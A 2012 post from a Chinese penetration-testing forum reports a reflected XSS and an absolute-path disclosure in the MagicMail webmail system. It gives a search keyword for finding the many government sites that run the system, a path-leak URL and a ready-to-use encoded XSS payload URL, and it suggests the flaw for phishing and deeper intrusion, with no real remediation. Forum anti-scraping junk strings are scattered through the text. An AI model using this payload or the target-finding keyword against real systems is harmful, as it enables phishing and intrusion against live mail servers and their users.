中国网络渗透测试联盟

标题: MagicMail迈捷邮件系统XSS及绝对路径漏洞 [打印本页]

作者: admin    时间: 2012-11-9 20:38
标题: MagicMail迈捷邮件系统XSS及绝对路径漏洞
今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
( a6 R- K7 W$ {- t; s1 Q8 S1 S2 ~+ m( H. U

1 V& K  I% Q3 L/ h1 {0 b2 y包含  一个反射性XSS  以及  绝对路径泄漏5 U" Q% Y" c" ~4 u- q
看了看 貌似全部是linux的。* d6 z9 I9 Y/ }. @9 R4 o
- M. u8 W# X6 H" ^
关键字:迈捷邮件系统 by MagicMail3 }+ z2 Z2 N& ?% l: g0 y
6 o9 ~5 i, o4 L% i7 {
可以看到很多政府网站都用这个邮件系统" K1 w6 L% S5 L- j& x
+ ~/ V4 Y8 U' Z- `" d* W
绝对路径 http://madman.in/index.php?login_type=declare&language=. f0 f+ b) m# ~, Z# t2 @0 K! A: u% _
6 g$ L! B8 ^4 {# @+ V

7 i7 `9 I. E1 u
5 }, m+ f" q1 a* c& F6 B* tXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
- C; f5 C2 e% c! ?- M7 _8 S( `  o+ l7 b% J4 S# t( S
0 s, D0 b; w& @- _  G- t! d1 u# D
8 e9 u$ A' j* ^. M
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等0 |& r6 v3 K* e
* r7 Q6 Y. K" S
修复方案:看官方补丁吧。  q6 D# G* o* d( N2 {$ g( O





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2